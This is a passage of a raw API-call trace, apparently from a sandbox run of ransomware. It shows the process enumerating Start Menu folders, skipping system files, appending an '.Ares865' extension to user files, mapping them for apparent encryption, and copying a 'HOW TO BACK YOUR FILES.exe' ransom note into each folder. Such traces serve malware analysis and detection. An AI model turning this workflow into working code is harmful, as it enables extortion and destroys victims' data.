ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0092.628] lstrcmpiW (lpString1="Desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.628] lstrcmpiW (lpString1="Desktop.ini", lpString2="aoldtz.exe") returned 1 [0092.628] lstrcmpiW (lpString1="Desktop.ini", lpString2=".") returned 1 [0092.628] lstrcmpiW (lpString1="Desktop.ini", lpString2="..") returned 1 [0092.628] lstrcmpiW (lpString1="Desktop.ini", lpString2="windows") returned -1 [0092.628] lstrcmpiW (lpString1="Desktop.ini", lpString2="bootmgr") returned 1 [0092.628] lstrcmpiW (lpString1="Desktop.ini", lpString2="temp") returned -1 [0092.628] lstrcmpiW (lpString1="Desktop.ini", lpString2="pagefile.sys") returned -1 [0092.628] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot") returned 1 [0092.629] lstrcmpiW (lpString1="Desktop.ini", lpString2="ids.txt") returned -1 [0092.629] lstrcmpiW (lpString1="Desktop.ini", lpString2="ntuser.dat") returned -1 [0092.629] lstrcmpiW (lpString1="Desktop.ini", lpString2="perflogs") returned -1 [0092.629] lstrcmpiW (lpString1="Desktop.ini", lpString2="MSBuild") returned -1 [0092.629] lstrlenW (lpString="Desktop.ini") returned 11 [0092.629] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk") returned 92 [0092.629] lstrcpyW (in: lpString1=0x2cce496, lpString2="Desktop.ini" | out: lpString1="Desktop.ini") returned="Desktop.ini" [0092.629] lstrlenW (lpString="Desktop.ini") returned 11 [0092.629] lstrlenW (lpString="Ares865") returned 7 [0092.629] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0092.629] lstrlenW (lpString=".dll") returned 4 [0092.629] lstrcmpiW (lpString1="Desktop.ini", lpString2=".dll") returned 1 [0092.629] lstrlenW (lpString=".lnk") returned 4 [0092.629] lstrcmpiW (lpString1="Desktop.ini", lpString2=".lnk") returned 1 [0092.629] lstrlenW (lpString=".ini") returned 4 [0092.629] lstrcmpiW (lpString1="Desktop.ini", lpString2=".ini") returned 1 [0092.629] lstrlenW (lpString=".sys") returned 4 [0092.629] lstrcmpiW (lpString1="Desktop.ini", lpString2=".sys") returned 1 [0092.629] lstrlenW (lpString="Desktop.ini") returned 11 [0092.629] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini.Ares865") returned 94 [0092.629] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\system tools\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\system tools\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0092.630] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\system tools\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.631] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=738) returned 1 [0092.631] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.631] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.631] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.631] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.632] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.632] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.632] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5f0, lpName=0x0) returned 0x15c [0092.632] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5f0) returned 0x190000 [0092.632] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.633] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.633] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.633] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.633] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.633] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.633] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.633] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.633] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.633] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0092.634] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.634] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0092.634] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.634] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.634] CloseHandle (hObject=0x15c) returned 1 [0092.634] CloseHandle (hObject=0x118) returned 1 [0092.635] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.635] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.635] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.635] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d111ec0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d111ec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0092.635] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0092.635] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x5df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer (No Add-ons).lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0092.635] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0092.635] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="aoldtz.exe") returned 1 [0092.635] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2=".") returned 1 [0092.635] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="..") returned 1 [0092.635] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="windows") returned -1 [0092.635] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="bootmgr") returned 1 [0092.635] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="temp") returned -1 [0092.635] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="pagefile.sys") returned -1 [0092.635] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="boot") returned 1 [0092.635] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="ids.txt") returned 1 [0092.635] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="ntuser.dat") returned -1 [0092.636] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="perflogs") returned -1 [0092.636] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2="MSBuild") returned -1 [0092.636] lstrlenW (lpString="Internet Explorer (No Add-ons).lnk") returned 34 [0092.636] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini") returned 86 [0092.636] lstrcpyW (in: lpString1=0x2cce496, lpString2="Internet Explorer (No Add-ons).lnk" | out: lpString1="Internet Explorer (No Add-ons).lnk") returned="Internet Explorer (No Add-ons).lnk" [0092.636] lstrlenW (lpString="Internet Explorer (No Add-ons).lnk") returned 34 [0092.636] lstrlenW (lpString="Ares865") returned 7 [0092.636] lstrcmpiW (lpString1="ns).lnk", lpString2="Ares865") returned 1 [0092.636] lstrlenW (lpString=".dll") returned 4 [0092.636] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2=".dll") returned 1 [0092.636] lstrlenW (lpString=".lnk") returned 4 [0092.636] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2=".lnk") returned 1 [0092.636] lstrlenW (lpString=".ini") returned 4 [0092.636] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2=".ini") returned 1 [0092.636] lstrlenW (lpString=".sys") returned 4 [0092.636] lstrcmpiW (lpString1="Internet Explorer (No Add-ons).lnk", lpString2=".sys") returned 1 [0092.636] lstrlenW (lpString="Internet Explorer (No Add-ons).lnk") returned 34 [0092.636] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk.Ares865") returned 117 [0092.636] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk.ares865"), dwFlags=0x1) returned 1 [0092.638] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.638] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1503) returned 1 [0092.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.639] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.639] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.639] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.639] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.640] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8e0, lpName=0x0) returned 0x15c [0092.641] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8e0) returned 0x190000 [0092.644] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.645] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.645] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0092.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0092.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.646] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.646] CloseHandle (hObject=0x15c) returned 1 [0092.646] CloseHandle (hObject=0x118) returned 1 [0092.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.646] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d424a7b, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Private Character Editor.lnk", cAlternateFileName="PRIVAT~1.LNK")) returned 1 [0092.646] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0092.646] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="aoldtz.exe") returned 1 [0092.646] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2=".") returned 1 [0092.646] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="..") returned 1 [0092.646] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="windows") returned -1 [0092.646] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="bootmgr") returned 1 [0092.646] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="temp") returned -1 [0092.646] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="pagefile.sys") returned 1 [0092.646] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="boot") returned 1 [0092.646] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="ids.txt") returned 1 [0092.646] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="ntuser.dat") returned 1 [0092.646] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="perflogs") returned 1 [0092.646] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="MSBuild") returned 1 [0092.646] lstrlenW (lpString="Private Character Editor.lnk") returned 28 [0092.646] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk") returned 109 [0092.646] lstrcpyW (in: lpString1=0x2cce496, lpString2="Private Character Editor.lnk" | out: lpString1="Private Character Editor.lnk") returned="Private Character Editor.lnk" [0092.646] lstrlenW (lpString="Private Character Editor.lnk") returned 28 [0092.646] lstrlenW (lpString="Ares865") returned 7 [0092.647] lstrcmpiW (lpString1="tor.lnk", lpString2="Ares865") returned 1 [0092.647] lstrlenW (lpString=".dll") returned 4 [0092.647] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2=".dll") returned 1 [0092.647] lstrlenW (lpString=".lnk") returned 4 [0092.647] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2=".lnk") returned 1 [0092.647] lstrlenW (lpString=".ini") returned 4 [0092.647] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2=".ini") returned 1 [0092.647] lstrlenW (lpString=".sys") returned 4 [0092.647] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2=".sys") returned 1 [0092.647] lstrlenW (lpString="Private Character Editor.lnk") returned 28 [0092.647] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk.Ares865") returned 111 [0092.647] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\system tools\\private character editor.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\system tools\\private character editor.lnk.ares865"), dwFlags=0x1) returned 1 [0092.649] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\system tools\\private character editor.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.649] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1306) returned 1 [0092.649] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.649] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.649] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.649] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.650] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.650] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.650] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x15c [0092.652] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x190000 [0092.652] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.653] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.653] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.653] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.653] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.653] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.653] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.653] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.653] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.653] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0092.654] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.654] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0092.654] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.654] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.654] CloseHandle (hObject=0x15c) returned 1 [0092.654] CloseHandle (hObject=0x118) returned 1 [0092.654] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.654] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.654] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.654] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d424a7b, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Private Character Editor.lnk", cAlternateFileName="PRIVAT~1.LNK")) returned 0 [0092.654] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0092.654] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a10 [0092.654] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility" [0092.654] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0092.654] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0092.654] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility") returned 75 [0092.654] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility" [0092.654] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0092.655] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\accessibility\\how to back your files.exe"), bFailIfExists=1) returned 0 [0092.655] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0092.655] GetLastError () returned 0x0 [0092.655] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0092.655] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0092.655] CloseHandle (hObject=0x120) returned 1 [0092.655] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0092.656] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0092.656] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Accessibility\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d111ec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d111ec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0092.656] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.656] lstrcmpiW (lpString1=".", 